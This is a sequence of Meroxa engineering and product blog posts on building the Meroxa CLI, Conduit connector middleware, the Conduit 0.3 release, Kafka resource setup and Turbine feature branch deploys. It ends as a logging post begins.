All users in the account will be able to access and edit the Account settings which includes the Account, Users, and Billing tabs. To access those tabs, click on your profile icon and select Account settings.

Have questions or feedback?

We are excited to take this initial step into Collaboration and will continue to build out features to enable a collaborative real-time code-first stream processing application code-first data application platform for developers. If you have questions or feedback, reach out directly byjoining our community or by writing to support@meroxa.com.

We can’t wait to see what you and your team build! 🚀

How We Built our Meroxa CLI

Raúl Barroso — Tue, 11 Oct 2022 16:54:21 GMT

Building a Command Line Interface (CLI) is as intimidating as trying to draw a painting in front of a blank canvas. You can feel inspired by the ones that resonate with your desired user experience, but ultimately you need to figure out some important things on your own along the way.

In this blog post, based on our own experience building the Meroxa CLI, I’ll guide you through some important aspects to consider when either architecting a CLI from scratch or maintaining an existing one.

Why build a Command Line Interface

Our mission at Meroxa is enabling engineers to build applications with real-time data while automating repetitive operations. Although we also offer a visual interface, we knew that by offering a CLI we were empowering engineers to stay in workflow.

By having a Command Line Interface as part of our product line-up we’ve given our customers the ability to automate their use of our platform since the beginning while also providing a user interoperability that feels natural and intuitive. The best of both worlds.

Starting a CLI

Let’s start with the simplest scenario, where you get to answer the most immediate and common questions:

What language will it be based on?
Is there an existing framework that will make my life easier as a developer?
Can I leverage existing tooling or solutions for the releasing process?
How should I structure the syntax of my CLI? “noun verb” or “verb noun” 🥫🪱

Language, framework, and tooling trifecta.

Your language of choice should be based on aspects as simple as what language you know, who you expect will contribute, and how you expect your CLI will be distributed. All these factors were easy to answer at Meroxa, considering the majority of our expertise has been embodied in services written in Go, and this language shines when it comes to portability across different operating systems.

Like with any other development product you are building, a framework comes in handy so you can focus on developing new features and not so much on repeating yourself with things that are not part of your core business. For CLIs written in Go, Cobra’s framework is the standard. It’s widely used by many developer tools and provides a variety of features that we knew we needed, so this seemed like a reasonable decision. On top of it, the appearance of many development tools are starting to elevate the CLI experience to another level (e.g. Charm’s tools), so continuing with the decision of using Go for our CLI seemed like a no-brainer.

Frameworks are not the only type of tooling that is important to consider in the development of your CLI. To make it accessible to others, choosing what tool to use for releasing could affect your focus substantially. Letting distribution to be managed with automated tools such as GoReleaser with Homebrew are a match made in heaven, allowing you to leverage GitHub actions to release new versions of your Homebrew formula every time a new tag is created. More about this topic below.

“noun verb”, “verb noun”, or how to make someone unhappy

Here comes the time to decide in which color you’ll paint your bikeshed.

At the time of structuring your CLI commands, you’ll hear arguments for whether you should use the “noun verb” form (e.g. meroxa resources list) or the one with “verb noun” instead (e.g.: meroxa list resources). This is probably a debate that will last until something like a search ahead autocomplete type of tool is in place on every CLI terminal out there. There’s no clear winner.

The first aspect we considered at the time of making a decision was by looking at how other CLIs that our customers could be using were structured. If our CLI users were accustomed to using a tool with a specific design, kubectl for example, which uses “verb noun”, we thought it made sense to go in that direction. The intention was to reduce friction between the two, and let users transition from one tool to another without too much overhead. We started with this approach when we bootstrapped our CLI, and we used this design for a few months.

Guess what we ended up doing. We decided to change it to “noun verb”. The reason was that since there wasn’t such a standard as “noun verb” vs “verb noun” across the community, we could always find other tools that would be a counterargument to our first decision. We had to keep digging on what direction we ultimately had to take, and our conclusion was that as humans, we tend to think on what is the thing we want to operate on first, and then what we can do with it after. We also considered that the form “noun verb” could also be beneficial for discovery purposes. At the time of running meroxa help, this command currently lists the main “things” you can interact with in our platform (apps, resources, etc). We found that having actions listed instead such as run, list, create, etc… wasn’t that helpful unless you were already familiar with all the features our Meroxa Platform provides.

Before Releasing

Before you take the step of sharing your CLI with other people, there are questions you should ask yourself. Prioritize accordingly before they become problematic for your development productivity.

The fact that you won’t know in what environments your users will run your CLI means that before going wild and sharing it with the world, spend a bit of time including features that will help you understand how to fix those previously released CLI bugs. Again, what we’re aiming for here is for you, as a developer, to spend as much time as possible developing new features (or fixing bugs) rather than having to go back and forth between your customers asking for more information so you can finally fix the issue.

The most important aspect is that for every CLI issue your customer finds, you should be able to respond with a specific command that once executed should give you some insight on what’s happening.

Here are some things we prioritized early in the development process:

Knowing your version

The most important command after help is version. This command should indicate exactly what CLI version your customers are running. When a customer reports an issue, you need to verify what version they’re on so you can identify whether that issue they’re reporting was already fixed and they only need to upgrade, or if in fact it’s a new issue you need to take care of.

Example:


$ meroxa version
meroxa/2.8.1 darwin/amd64

Later in the process we noticed we also needed to be more specific for those advanced users that weren’t using an upstream version of the CLI, but rather if they had built the binary locally. For that reason, we included a dev indication as part of the version, the git commit sha they were running, and the closest git tag its commit was associated with.

For those adventurous users who had modified the code locally, meroxa version would include (updated) to tell us this was the case. Here’s a changelog we published announcing this change.

Showing API headers and stack trace

Another very common issue I often see on other CLIs is their code not dealing with API errors correctly. For example, a customer runs a command and returns a very generic error message, or not error at all. That’s not very helpful, is it?

Ideally, you should be able to ask your customer to run the same command they did before, but with some special flag or header instead that could include the entire trace of your command and then give you the exact information you’re looking for.

This command, in addition to the expected output, should return things such as:

What API endpoints this command called with its HTTP headers.
Their actual API responses as they happened including response HTTP headers.

At Meroxa, we offered two options to accomplish this:

Setting a MEROXA_DEBUG environment variable. (e.g.: MEROXA_DEBUG=1 meroxa resources ls
Providing a --debug flag (e.g.: meroxa resources ls --debug)

The benefit of using an environment variable is that you could easily set this so it works with all your commands. The second option should be documented via meroxa help, and it’s more suitable for one-off attempts when something goes wrong.

As part of this, you should also bear in mind that users will likely copy the entire stack trace and send it to you. To make this more secure, consider obfuscating your user’s access token: Authorization: Bearer eyAtIe...FHtiNTA

Otherwise, these could easily end up in some chat, email, or support tool when in fact these should only belong to your customer.

Logged in user

Different users could have different behaviours, so an easy checkpoint you should have around your logged in users is being able to precisely identify what account they’re using. Something like this is sufficient:


$ meroxa whoami
raul@meroxa.io

Automated testing

For every pull-request we try to merge in our main branch of our CLI repository, we run a sequence of tests to ensure an expected output based on the provided input.

In order to make our CLI compatible with automated testing we needed to make scripting possible with things such as:

Providing a --json flag to all commands so we could check for specific deterministic results and instead not compare with string outputs that could easily change and break our automation scripts.
Being able to execute a command with no prompts. We have some commands where customers are expected to provide some required information so the CLI can carry on with its execution. We needed to be able to accomplish the same without any user input. Let’s take removing an artifact as an example which usually requires confirmation as it’s a destructive action. At Meroxa, you’d use --force with the value to confirm. e.g.: meroxa resources rm my-resource --force my-resource
Being able to have different configuration files. This one is highly dependent on what kind of CLI you’re developing, but in our case, we wanted to make sure our CLI was operating correctly in different environments, and an easy way to configure that is by using a configuration file. Something users could do, such as meroxa resources ls --config PATH_OF_ANOTHER_CONFIG_FILE which should contain all the configuration that makes your CLI operate with another environment very easily.

Ready to release

Once you have put together a bare minimum set of features that you think will make your life as a developer not too complicated, it’s releasing time.

To distribute our CLI, we decided to start using an industry standard such as Homebrew.

Like I mentioned before, considering our CLI was written in Go, using the fantastic tool GoReleaser made perfect sense. This one includes a way to automatically generate a Homebrew Tap so with every tag that’s created in our CLI repository, a GitHub action creates a new version of our HomeBrew formula.

Maintaining a CLI

At this point, we were able to ship a first iteration of our CLI so users could download it with certain confidence. Now, I’ll mention the other things we prioritized that weren’t necessarily our main product features.

Collaboration

Being a sole developer can only get you that far. It was certainly time to invest to make our code ready for contributions. This is especially important if you’re working in the open (source). Here’s some guidance I would consider relevant.

Get creative, CLI builder

At Meroxa, we decided that while Cobra’s set of features was great to start with, we considered that CLI composition could be improved to our own benefit.

If we wanted to replicate behaviour across certain types of commands, while maintaining the same user experience across them regardless of our own developer’s awareness of these, we would need a way of building commands based on the desired behaviour of each command. Something declarative and easily tested.

For example, on root (meroxa), every subcommand is added like this, which uses this function to return a Cobra Command interface type, based on the methods that it implements.

For instance, when creating a new command, we would define what methods it needs to implement like this:


var (
	_ builder.CommandWithDocs             = (*Remove)(nil)
	_ builder.CommandWithAliases          = (*Remove)(nil)
	_ builder.CommandWithArgs             = (*Remove)(nil)
	_ builder.CommandWithClient           = (*Remove)(nil)
	_ builder.CommandWithLogger           = (*Remove)(nil)
	_ builder.CommandWithExecute          = (*Remove)(nil)
	_ builder.CommandWithConfirmWithValue = (*Remove)(nil)
)

This way, it forces the developer to implement any method that's required for each of its interfaces.

As an example, the following interface is added for every destructive command:


type CommandWithConfirmWithValue interface {
	Command
	// ValueToConfirm adds a prompt before the command is executed where the user is asked to write the exact value as
	// wantInput. If the user input matches the command will be executed, otherwise processing will be stopped.
	ValueToConfirm(ctx context.Context) (wantInput string)
}

What this gives us is a command that, before executing, prompts you to input a specific value:


func buildCommandWithConfirmWithValue(cmd *cobra.Command, c Command) {
	v, ok := c.(CommandWithConfirmWithValue)
	if !ok {
		return
	}

	var force bool

	cmd.Flags().BoolVarP(&force, "force", "f", false, "skip confirmation")

	old := cmd.RunE
	cmd.RunE = func(cmd *cobra.Command, args []string) error {
		if old != nil {
			err := old(cmd, args)
			if err != nil {
				return err
			}
		}

		// do not prompt for confirmation when --force is set
		if force {
			return nil
		}

		wantInput := v.ValueToConfirm(cmd.Context())

		reader := bufio.NewReader(os.Stdin)
		fmt.Printf("To proceed, type %q or re-run this command with --force\n▸ ", wantInput)
		input, err := reader.ReadString('\n')
		if err != nil {
			return err
		}

		if wantInput != strings.TrimSuffix(input, "\n") {
			return errors.New("action aborted")
		}

		return nil
	}
}

Any command that implements the CommandWithConfirmWithValue interface would require that the given argument be provided a second time, unless the override flag is used. Example:


func (r *Remove) ValueToConfirm(_ context.Context) (wantInput string) {
	return r.args.NameOrUUID
}

Documentation

Inline with what’s been mentioned on different occasions on this blog post is the need to automate as much as possible. Cobra’s framework provides the ability to generate documentation automatically,, and we do so in a specific format so it’s live in our public documentation.

For every change we’re able to communicate externally, we consider presenting those in a changelog so our customers can keep up with announcements they might be interested in.

Keep your users using the latest

The expectation of our Platform is that we’ll release new features often, and we need to make our customers aware of this so they upgrade fast. At Meroxa, we accomplished this by presenting a warning if they haven’t upgraded within the last week:


$ meroxa whoami 
raul@meroxa.io
  🎁 meroxa v2.8.1 is available! Update it by running: `brew upgrade meroxa`
  🧐 Check out latest changes in https://github.com/meroxa/cli/releases/tag/v2.8.1
  💡 To disable these warnings, run `meroxa config set DISABLE_NOTIFICATIONS_UPDATE=true`

Always aim for a good Developer Experience

Above all the features we have considered adding to our CLI, there’s one bucket that is always high on our list, and this one is improving its User Experience, even if this implies adding support to other external tools.

For example, we recently integrated with Fig and Warp to improve autocomplete and resource workflows as mentioned in the following changelogs:

Conclusion

Developing a CLI is a very exciting journey. The speed of interacting programmatically with a Platform is difficult to beat when you’re using a terminal. With this blog post, I hope I gave you some ideas on how to approach your own CLI development. If that’s the case, I highly recommend giving this a read: https://clig.dev/.

Have questions or want to chat about the process?, I’ll be happy to help on our Discord channel, or reach out via support@meroxa.io.

Middleware for Conduit Connectors Improves Developer Experience

Lovro Mažgon — Wed, 05 Oct 2022 14:47:21 GMT

Conduit v0.3.0 was recently released and brought lots of useful features that make the user as well as the developer experience nicer and simpler. One of these features is connector middleware in the connector SDK. In this blog post we will explain what middleware is, why we added it, how it solves our problems and how to use it yourself.

The problem we faced

Before we dive into middleware, let’s first give you some context around Conduit and the problem we faced.

Conduit is a data integration tool that uses connectors to fetch data from and write data to third-party systems. A connector is a plugin that runs in its own process and follows the prescribed connector protocol. We use protocol buffers and gRPC to define the interface used in the connector protocol. On one hand, this gives us the flexibility to write connectors in any programming language, but on the other hand, it requires the connector developer to deal with the complexity of gRPC streams and write a lot of boilerplate code themselves. Because we want to make the developer experience better and standardize the behavior of connectors as much as possible we provide a connector SDK for connectors written in Go. The SDK hides the complexity, implements common boilerplate code, provides utilities for implementing a connector, and allows the developer to focus on writing the connector functionality without worrying about the protocol.

After implementing more than 25 connectors it became clear that there was still room for improvement in terms of reducing duplicated code found in multiple connectors. We saw repeated code in some connectors that needed the same functionality, like rate limiting or batching. The problem we faced is that these features are not applicable for all connectors so we can’t bake them into the SDK and enable them for all connectors. Furthermore, even if connectors require the same functionality, they may expect different default values to configure the functionality (e.g. default batch size).

To solve this problem, we came up with the following requirements:

We want to be able to add features that are needed across all connectors (e.g. batching).
These added features need to be configurable by the end-user.
Connector developers should be in control of adding or opting out of a feature in their connector (no hidden logic).
There should be a default set of features, so we can add more in the future and easily roll them out to all connectors.
Connector developers should be able to choose the defaults for these features in their connector.

Fulfilling these requirements will bring many benefits - it would further standardize the behavior of connectors, cut down on code duplication, and in the long run, it will help us reduce the number of bugs and making it easier to maintain our connectors.

Middleware

As soon as we had a clear list of requirements a lightbulb went off in our heads - we need to introduce a middleware!

What is middleware, you ask? Different people understand different things under the term. Some may think of OS middleware that expands the functionality of an operating system, others might think of middleware as services in the context of distributed applications. Regardless of the specific middleware you think of, one thing is true for all: as the name suggests, it’s a piece of software that sits in the middle of two components and provides additional functionality. You can imagine middleware like augmented reality glasses - they allow the wearer to see and interact with their environment as before while providing additional information on top.

In this post we use the term middleware to describe a piece of code that functions like a wrapper around an object and forwards calls to the underlying object while manipulating the parameters and/or return values. It’s common that the underlying object implements a certain interface so that the middleware does not have to be aware of what specific object it is wrapping. The middleware in turn also implements the same interface, so that a wrapped object can still be used through that interface.

Perhaps the most common use of the middleware pattern in Go are HTTP handlers. It’s common practice to wrap http.Handler objects with middleware that adds functionality like logging or authentication. Here’s an example of HTTP middleware in Go:

package main

import (
	"log"
    "net/http"
)

func loggingMiddleware(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		log.Print("received request")
		next.ServeHTTP(w, r)
		log.Print("send response")
	})
}

func hello(w http.ResponseWriter, r *http.Request) {
	w.Write([]byte("hello"))
}

func main() {
	handler := http.HandlerFunc(hello)
	err := http.ListenAndServe(":8080", loggingMiddleware(handler))
	log.Fatal(err)
}

Notice that loggingMiddleware is unaware of what http.Handler it is wrapping. Since the middleware itself is an http.Handler it can even wrap another middleware (chaining middleware is also common practice). The base functionality of the HTTP handler is still the same, the middleware forwards the call while executing some operations before and after.

How Connector Middleware solves our problem

The middleware pattern checks all the boxes of our requirements list. Let’s go through them one by one.

We want to be able to add features that are needed across all connectors.

This is exactly what middleware does; it adds additional functionality without changing the basic functionality. It can be applied to any object that implements a certain interface, in our case the interfaces are Source and Destination.

These added features need to be configurable by the end-user.

The Source and Destination interfaces are in control of defining how the connector can be configured. The middleware can wrap the function Parameters to adjust the specifications and tell the UI to display additional parameters. When the user creates the connector, the configuration is passed to the function Config, which can again be wrapped by the middleware to parse the injected parameters.

Connector developers should be in control of adding or opting out of a feature in their connector.

We were already using a constructor function in our connectors which is the perfect place for adding middleware. The constructor is implemented by the connector developer so they can choose to add any middleware they want. Note that we encourage developers to add at least the default middleware unless they have a good reason not to do so.

There should be a default set of features, so we can add more in the future and easily roll them out to all connectors.

The SDK provides functions that return the default connector middleware (DefaultSourceMiddleware and DefaultDestinationMiddleware). Developers are encouraged to add the default middleware to their connectors unless they have a good reason not to do so. All connectors that will use the default middleware will automatically benefit from new middleware that gets added in future SDK releases. This will ensure that we can further standardize the behavior of our connectors and easily roll out common features.

Connector developers should be able to choose the defaults for these features in their connector.

We solved this by implementing middleware as structs with public fields that contain the default values for the parameters it introduces. The connector developer can choose the default values when adding middleware to their connector.

Example usage

Here we will show how easy it is to apply middleware on connectors. We will focus on the Destination, although the same principles apply when implementing a Source.

We start with a simple destination struct and a constructor function.

type Destination struct {
	sdk.UnimplementedDestination
}

func NewDestination() sdk.Destination {
	// return an instance of Destination
	return &Destination{}
}

To add the middleware to the destination the SDK provides a utility function called DestinationWithMiddleware. The SDK also provides the function DefaultDestinationMiddleware which returns a set of default middleware and should be used in most connectors. In future SDK releases we may add more middleware to the set, this way most connectors will benefit from new middleware simply by updating the SDK version.

type Destination struct {
	sdk.UnimplementedDestination
}

func NewDestination() sdk.Destination {
	// return an instance of Destination wrapped in the default middleware
	destination := &Destination{}
	middleware := sdk.DefaultDestinationMiddleware()

	return sdk.DestinationWithMiddleware(destination, middleware...)
}

If there is a good reason not to use the default middleware (e.g. choose different defaults or remove a middleware) the developer can freely choose which middleware to apply. For example, this is how we would apply only the batching middleware and set a default batch size of 100.

type Destination struct {
	sdk.UnimplementedDestination
}

func NewDestination() sdk.Destination {
	// return an instance of Destination wrapped in custom middleware
	destination := &Destination{}
	middleware := []sdk.DestinationMiddleware{
		sdk.DestinationWithBatch{ DefaultBatchSize: 100 },
	}

	return sdk.DestinationWithMiddleware(destination, middleware...)
}

Conclusion

With the introduction of a connector middleware we intend to make the connector developer experience even nicer and simpler. Connector developers can utilize middleware provided by the SDK to enrich the functionality of their connectors without reinventing the wheel. Even Conduit users will benefit from the middleware, as the functionality provided by a middleware will work the same way across all connectors.

If this got you interested in Conduit don’t hesitate to join our Discord and say hello! We invite you to give Conduit a try and let us know what you like and don’t like. Our mission is to make Conduit the go-to tool for data integration and your feedback can help us reach that goal!

Announcing Conduit 0.3

Rimas Silkaitis — Tue, 27 Sep 2022 14:53:25 GMT

Conduit 0.3 is here! Conduit is a tool that helps developers move data within their infrastructure to the places they’re needed.

Getting started is easy as downloading Conduit from the Releases page on GitHub and running:

$ ./conduit

What’s New

OpenCDC - Consistency in Payloads

One of the biggest pieces of work in this release is Conduit’s support for OpenCDC. A gripe that we hear about production data integration tools is that the formats for Change Data Capture (CDC) can be all over the place even between connectors within the same tool! The downstream impact is that developers then need to code toward specific connectors. OpenCDC provides high-level guarantees on the format that you can expect from any connector that has CDC support in Conduit.

OpenCDC represents a breaking change in Conduit’s Connector SDK. This means that any connector that hasn’t been updated to work with 0.3 will only work with 0.2. We’ve updated the connector list in the Conduit repo to reflect which connectors are ready for OpenCDC. You can check out this blog post to learn more about OpenCDC.

Create Pipelines with a Pipeline Config File

In some production situations, you might not want to orchestrate pipelines via an API or a UI. If your data stores don’t change all that much, a static file might be the best way to configure a pipeline. With the release of the Pipeline Config File feature, you have the ability to use `yaml` to configure pipelines. The added benefit of this feature is that you can put the file in source control and have more measured changes to any of your pipelines.

JavaScript Processors

Imagine a scenario where you need to drop personally identifiable information before any data reaches less sensitive downstream systems. The best way to do this would be to attach some code to the pipeline. In Conduit 0.3, it’s now possible to use Javascript to transform data. Javascript is the first language that we’re supporting but we plan to provide support for more languages over time. Don’t worry, Conduit does not have an external dependency on Node. Conduit uses goja to make this possible.

Processors can be injected after data comes from a source connector, during the pipeline itself, or before the data goes to a destination connector. The best way to build processors is to include them as part of your pipeline configuration file like so:

Processors can also be created as part of an API call to Conduit. This is great in cases where you’re building pipelines programmatically as part of your internal processes or even your own product!

And So Much More

If you want to see the full list of what was included in this release, check out the Conduit Changelog and the documentation. This blog post only covers a fraction of what was included. In the coming weeks, we’ll be releasing more blog posts on topics like the performance benchmarks of Conduit 0.3 and connector middleware.

The Conduit team would love to hear about how you’re using Conduit in your setup. Please hit us up on Discord, GitHub Discussions, or Twitter!

Bringing Continuous Delivery to Kafka & Streaming Data Apps

Rimas Silkaitis — Wed, 14 Sep 2022 12:00:00 GMT

Writing applications against streaming or event-driven data is an incredible challenge. Developers are beholden to upstream schemas or have to write a considerable amount of plumbing with streaming systems before getting to the value-add work of their applications. In web development, developers are in control of their schemas. Any time a new feature is built that needs to persist some data, the developer writes a change to the schema and deploys it when they choose to. For streaming applications, the developers aren’t in control. They’re at the mercy of whatever upstream system or process generates the data.

Today we’re happy to announce two new features to the Meroxa platform that aim to make developing against streaming data easier. First, is the Apache Kafka Connector. The concepts and paradigms for streaming data started with Apache Kafka. The second feature is Feature Branch Deploys for streaming data applications. The ability to test a streaming application against staging and a copy of production data is critical. This gives developers the confidence that their changes, once merged to the `main` branch and deployed to production, will work as expected.

Apache Kafka Connector

Many streaming applications start with the core infrastructure of Apache Kafka. Its ability to allow developers to produce and consume data to any number of systems or streaming applications is what’s made it successful. Part of the challenge for any developer learning to build apps off of Apache Kafka is all the new streaming paradigms between delivery semantics and partitions, just to name a few. With support for Apache Kafka on Meroxa, as a source and a destination, it’s never been easier to focus on the business logic instead of all of the plumbing. Check out the feature launch blog post for more details. Support for producing and consuming from Apache Kafka is just the beginning as we work toward the goal of enabling developers to focus on value-add development instead of plumbing.

Feature Branch Deploys

Feature Branch Deploys is the first step on a path to enabling modern continuous delivery practices for streaming data applications. Writing unit and integration tests are important when building any application whether that’s for the web or streaming data applications. They let you know if what you’ve built meets your requirements and expectations. That level of testing is already possible when building Turbine streaming data apps. Nothing compares to taking what you’ve built and testing it against staging or production data. After all, data is what drives streaming applications.

Any time you have a branch in your Turbine application, you’ll be able to deploy that branch directly to Meroxa. Meroxa will do the work of sending the data you want to your application to consume, making sure that it doesn’t impact the production version of the application. Check out our write-up on Feature Branch Deploys.

Get Started with Meroxa

Both features are available today on the Meroxa platform. Get started by creating your own Turbine streaming data application and let us know what you’re building! We’d love to hear about it, so don't forget to share with us on Twitter or in our Discord community.

New Integration Resources: Apache Kafka and Confluent Cloud

Jennifer Hudiono — Wed, 14 Sep 2022 11:00:00 GMT

Behind every streaming application exists a combination of data and events. With the rising popularity and complexity of event-driven and streaming architectures,data applications offer developers a powerful solution. Data applications are centered around real-time or near real-time events which is key for a lot of modern data processing applications. Today, we are taking an important step towards helping customers build data applications with support for Apache Kafka as a resource on Meroxa.

Apache Kafka is an open-source streaming platform maintained by the Apache Software Foundation and since its creation in 2011, Kafka has evolved from a messaging queue to a robust event streaming platform. Confluent Cloud is a fully managed, cloud-native Kafka service for connecting and processing all of your data, everywhere it’s needed, founded by the original Kafka developers who ran the service at massive scale while at LinkedIn. Apache Kafka and Confluent Cloud can now be added as a resource on the Meroxa Platform with just a few steps. Adding support for producing and consuming Apache Kafka Topics and Streams is only the beginning as we continue to make data apps easier to build for developers.

Getting Started

Kafka is a distributed system consisting of servers and clients that communicate via a high-performance TCP network protocol. In Kafka, a Topic is a category/name used to store and publish records similar to tables in a database. The server that the topics are hosted on is called a Broker and a Cluster typically consists of multiple brokers working together to provide scale and reliability. Bootstrap servers contain the host and port pair that represent the address of the broker.

In the following examples, we will walk you through the steps necessary to add Apache Kafka as a resource on the Meroxa Platform.

Apache Kafka

To connect to Apache Kafka, you need an Apache Kafka server. Refer to Apache Kafka https://kafka.apache.org/quickstart to create one.

Prerequisites

Bootstrap server information available in the server.properties file
Username and Password available in the KafkaServer section in the JAAS file
The Certificate Authority (CA) file, the client certificate, and the client key if Secure Sockets Layer (SSL) encryption is used.

With the information above, you can add Apache Kafka as a resource through the CLI or Dashboard.

Meroxa CLI

In the CLI, use the Meroxa resource create command to configure your Apache Kafka resource.

The following example depicts how this command is used to create an Apache Kafka resource named apachekafka with the minimum configuration required.

$ meroxa resource create apachekafka \
  --type kafka \
  --url "kafka+sasl+ssl://<USERNAME>:<PASSWORD>@<BOOTSTRAP_SERVER>?sasl_mechanism=plain" \

In the example above, replace the following variables with valid credentials from your Apache Kafka environment:

$USERNAME - Apache Kafka Username
$PASSWORD - Apache Kafka Password
$BOOTSTRAP_SERVER -  Host and Port of the Kafka broker

For additional configuration and information on how to add Apache Kafka Resource, check out the Apache Kafka Resource documentation.

MEROXA DASHBOARD

Combine the username, password, and bootstrap server information to construct a Connection URL in the following format:

kafka+sasl+ssl://<USERNAME>:<PASSWORD>@<BOOTSTRAP_SERVER>?sasl_mechanism=plain

If you’re using Secure Sockets Layer (SSL) encryption then you can toggle the Establish a trusted connection and input The Certificate Authority (CA) file, the client certificate, and the client key.

Confluent Cloud

To connect to Confluent Cloud Apache Kafka, you need to have a Kafka cluster. Refer to Confluent’s quickstart guide to create one.

Prerequisites:

API key (Follow the [guide](https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#create-keys-for-a-cluster](https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#create-keys-for-a-cluster) to set up your API keys.)
API secret (this can be found with API key)
Bootstrap Server (Refer to your [Cluster settings](https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#view-cluster-details](https://docs.confluent.io/cloud/current/get-started/cloud-basics.html#view-cluster-details) to retrieve the Bootstrap Server. )

With the information above, you can add Apache Kafka as a resource through the CLI or Dashboard.

CLI

Use the meroxa resource create command to configure your Confluent Cloud resource.

The following example depicts how this command is used to create a Confluent Cloud resource named confluentcloud with the minimum configuration required.

$ meroxa resource create confluentcloud \
  --type confluentcloud \
  --url "kafka+sasl+ssl://<API_KEY>:<API_SECRET>@<BOOTSTRAP_SERVER>?sasl_mechanism=plain" \

In the example above, replace the following variables with valid credentials from your Confluent Cloud Cloud Console:

$API_KEY - Cluster API Key
$API_SECRET - Cluster API Secret
$BOOTSTRAP_SERVER -  Host and Port of the Cluster

For additional information on how to add Confluent Cloud Resource, check out the Confluent Cloud Resource documentation.

DASHBOARD

Input the API Key, API Secret, and Bootstrap Server information into the corresponding fields to add a Confluent Cloud Kafka resource.

Things to know

With Kafka, you can pick a data format of your choice. It’s important to be consistent across your usage when using Kafka upstream to any downstream resources. Currently, Meroxa only supports JSON.
Meroxa uses SASL/PLAIN configuration to authenticate with Kafka. SASL/PLAIN is a simple username/password authentication mechanism that is typically used with TLS for encryption to implement secure authentication)

Have questions or feedback?

If you have questions or feedback, reach out directly by joining our community or by writing to support@meroxa.com.

We can’t wait to see what you build! 🚀

Turbine Feature Branch Deploys

Sara Menefee — Wed, 14 Sep 2022 11:00:00 GMT

At Meroxa we have committed to delivering exceptional developer experiences. Today, we are excited to introduce feature branch deploys—a first step toward enabling continuous delivery for Turbine data applications on the Meroxa Platform.

Data applications may undergo several code changes by one or many developers throughout the development lifecycle. Using feature branches, contributing developers can effectively branch off the main or production instance of their data application code. This allows them to further develop and test changes without impacting production code.

Deploying from feature branches enables developers to test the outcomes of their code directly against production data—a crucial step before merging and deploying their code to the production instance of their data application.

Deploying from a feature branch

In the following examples, we will walk you through the steps necessary to deploy a Turbine data application from a feature branch.

Create a feature branch

First, create a feature branch and name it something descriptive. The name you chose for your feature branch will automatically append to the end of your application name when deployed to Meroxa. This will help identify test instances to production instances of your Turbine data applications.

$ git checkout -b "transform"
Switched to a new branch 'transform'

Once a feature branch is checked out, you are ready to launch your code editor and begin making changes. When using feature branch deploys to test, we recommend you carefully review your Turbine code to ensure the appropriate data resources are used for testing. We recommend swapping out any downstream production data resources with test resources. This will help prevent any unintended updates to production data.

🎈 Note: Testing resources must be created and configured on Meroxa to be accessible to your Turbine data app test instances.

Commit your changes

Next, commit your code to prepare for deployment. Be sure to look over your Turbine code before committing your changes. It is also good to ensure you’re on the correct branch, you can check this by running the following command:

$ git branch
  main
* transform

Once you’ve confirmed you’re in the correct branch, commit your code with the following commands:

$ git add .
$ git commit -m "Anonymize PII field"
[transform 1a1234b] Anonymize PII field
1 file changed, 1 insertion(+), 1 deletion(-)

Deploy

Once the code is committed, you’re ready to deploy. Simply run the following command:

$ meroxa app deploy
Checking for uncommitted changes...
  ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
Preparing application "users-transform" (golang) for deployment...
  ✔ Application built!
✔ Can access your Turbine resources
  ✔ Application processes found. Creating application image...
  ✔ Platform source fetched
✔ Dockerfile created
  ⠋ Creating "/Users/local/path/users" in "turbine-users-transform.tar.gz"
  ✔ "turbine-users-transform.tar.gz" successfully created in "/Users/local/path/users"
  ✔ Source uploaded
  ✔ Removed "turbine-users-transform.tar.gz"
  ⠋Removing Dockerfile created for your application in /Users/local/path/users
  ✔ Dockerfile removed
  ✔ Successfully built Process image! ("UUID")
  ✔ Deploy complete!
  ✔ Application "users-transform" successfully created!
  
✨ To visualize your application visit <https://dashboard.meroxa.io/apps/UUID/detail>

There you have it! You’ve successfully deployed from a feature branch. You can now check any downstream testing resources to see the outcomes of the changes made.

Validation errors

To protect from unintentional updates to your production data, the Meroxa Platform automatically validates resource collections referenced in your code. Here are some validation errors you may encounter as well as steps on how to resolve them.

Duplicate records validation

All destination resource collections referenced in your code are checked against Turbine data app instances already running on the Meroxa Platform. If another Turbine data app uses the same destination resource collection, the deployment process will be flagged by our validation. This is intended to prevent accidental record duplication in downstream resources:

$ meroxa app deploy
Checking for uncommitted changes...    ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
Preparing application "users-transform" (javascript) for deployment...
  ✔ Application built!
  x Resource availability check failed
Error: ⚠️ Application resource "pg_user" with collection "orders" cannot be used as a destination. It is also being used as a destination by another application "users".
    
Please modify your Turbine data application code. Then run `meroxa app deploy` again. To skip collection validation, run `meroxa app deploy --skip-collection-validation`.

Looping validation

If a data app references a source resource collection that is the same as the destination resource collection in the Turbine code, this will result in the deploy process failing with a resulting error. This validation prevents accidental looping effects within a single Turbine data app. This does not detect loops across multiple apps within an account.

$ meroxa app deploy
Checking for uncommitted changes...
  ✔ No uncommitted changes!
✔ Feature branch (transform) detected, setting app name to users-transform...
  Preparing application "users-transform" (javascript) for deployment...
  ✔ Application built!
  x Resource availability check failed
Error: ⚠️ Application resource "pg_users" with collection "orders" cannot be used as a destination. It is also the source.

Please modify your Turbine data application code. Then run `meroxa app deploy` again. To skip collection validation, run `meroxa app deploy --skip-collection-validation`.

Here is an example of how this may manifest in your code:

exports.App = class App {
  async run(turbine) {
    let source = await turbine.resources("pg_users");
    let records = await source.records("orders");
    let destination = await turbine.resources("pg_users");
    await destination.write(records, "orders");
  }
};

Skip collection validation

There are some cases where you would want to bypass the above validations and deploy the application. For these scenarios, you can run meroxa app deploy --skip-collection-validation.

Have questions or feedback?

If you have questions or feedback, reach out directly by joining our community or by writing to support@meroxa.com.

We can’t wait to see what you build! 🚀

Log & Metric Experiences Matter for Streaming Data

Rimas Silkaitis — Tue, 06 Sep 2022 16:35:54 GMT

Conduit is an open-source project that will help you stream data from any of your production data stores to the places where you need it in your infrastructure. This post is about the principles around Conduit’s logging and metrics capabilities and why these principles are better for developers when moving data into systems like Apache Kafka.

The opportunity to delight someone using your tool can happen at any time. While fancy web UIs or mobile apps tend to get the limelight, developer experience can apply to even the most mundane needs; logging and metrics. I’ll use logging and metrics somewhat interchangeably throughout this post but where the difference matters, I’ll make sure to call that out.

Principles

